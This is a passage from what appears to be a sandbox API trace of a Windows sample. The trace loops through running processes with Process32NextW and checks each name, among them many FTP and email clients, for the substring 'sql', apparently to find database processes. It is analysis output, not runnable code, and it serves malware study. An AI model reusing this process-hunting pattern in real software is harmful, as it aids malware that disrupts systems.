(uFlags=0x40, uBytes=0x1c) returned 0x355c768 [0091.232] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x355c768, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0091.232] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0091.233] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="sql") returned 0x0 [0091.233] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0091.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0091.234] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x355c470 [0091.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x355c470, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0091.234] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0091.234] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="sql") returned 0x0 [0091.234] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0091.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.235] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3559598 [0091.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3559598, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0091.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0091.235] StrStrIA (lpFirst="powell_jane.exe", lpSrch="sql") returned 0x0 [0091.235] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0091.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.237] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355b4f8 [0091.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x355b4f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0091.237] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0091.237] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="sql") returned 0x0 [0091.237] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0091.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0091.238] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3559478 [0091.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3559478, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0091.238] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0091.238] StrStrIA (lpFirst="gainedshape.exe", lpSrch="sql") returned 0x0 [0091.238] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0091.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.239] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355b5f8 [0091.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x355b5f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0091.239] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0091.239] StrStrIA (lpFirst="opens-versions.exe", lpSrch="sql") returned 0x0 [0091.239] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0091.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0091.240] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x355c4c0 [0091.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x355c4c0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0091.240] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0091.240] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="sql") returned 0x0 [0091.240] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0091.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.241] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3559508 [0091.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3559508, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0091.241] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0091.242] StrStrIA (lpFirst="3dftp.exe", lpSrch="sql") returned 0x0 [0091.242] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0091.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.243] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355ba18 [0091.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x355ba18, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0091.243] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0091.243] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="sql") returned 0x0 [0091.243] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0091.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.244] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3559550 [0091.244] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3559550, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0091.244] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0091.244] StrStrIA (lpFirst="alftp.exe", lpSrch="sql") returned 0x0 [0091.244] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0091.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.245] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3559568 [0091.245] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3559568, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0091.245] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0091.245] StrStrIA (lpFirst="barca.exe", lpSrch="sql") returned 0x0 [0091.245] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0091.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.246] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35594a8 [0091.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x35594a8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0091.246] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0091.246] StrStrIA (lpFirst="bitkinex.exe", lpSrch="sql") returned 0x0 [0091.246] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0091.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.247] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3559580 [0091.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3559580, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0091.247] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0091.247] StrStrIA (lpFirst="coreftp.exe", lpSrch="sql") returned 0x0 [0091.247] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0091.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0091.248] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547858 [0091.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3547858, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0091.248] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0091.248] StrStrIA (lpFirst="far.exe", lpSrch="sql") returned 0x0 [0091.248] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0091.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.249] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x35595e0 [0091.249] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x35595e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0091.249] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0091.250] StrStrIA (lpFirst="filezilla.exe", lpSrch="sql") returned 0x0 [0091.250] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0091.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.251] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x35595f8 [0091.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x35595f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0091.251] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0091.251] StrStrIA (lpFirst="flashfxp.exe", lpSrch="sql") returned 0x0 [0091.251] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0091.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.252] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3559460 [0091.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3559460, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0091.252] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0091.252] StrStrIA (lpFirst="fling.exe", lpSrch="sql") returned 0x0 [0091.252] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0091.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0091.263] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x355ba38 [0091.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x355ba38, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0091.263] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0091.263] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="sql") returned 0x0 [0091.263] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0091.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0091.264] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x355b978 [0091.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x355b978, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0091.264] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0091.264] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="sql") returned 0x0 [0091.264] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0091.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0091.265] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3547888 [0091.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3547888, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0091.265] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0091.265] StrStrIA (lpFirst="icq.exe", lpSrch="sql") returned 0x0 [0091.265] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0091.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.266] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3559490 [0091.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3559490, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0091.267] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0091.267] StrStrIA (lpFirst="leechftp.exe", lpSrch="sql") returned 0x0 [0091.267] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0091.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0091.268] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3558ec0 [0091.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3558ec0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0091.268] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0091.268] StrStrIA (lpFirst="ncftp.exe", lpSrch="sql") returned 0x0 [0091.268] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0091.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.272] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3544d20 [0091.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3544d20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0091.272] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0091.272] StrStrIA (lpFirst="notepad.exe", lpSrch="sql") returned 0x0 [0091.272] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0091.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, 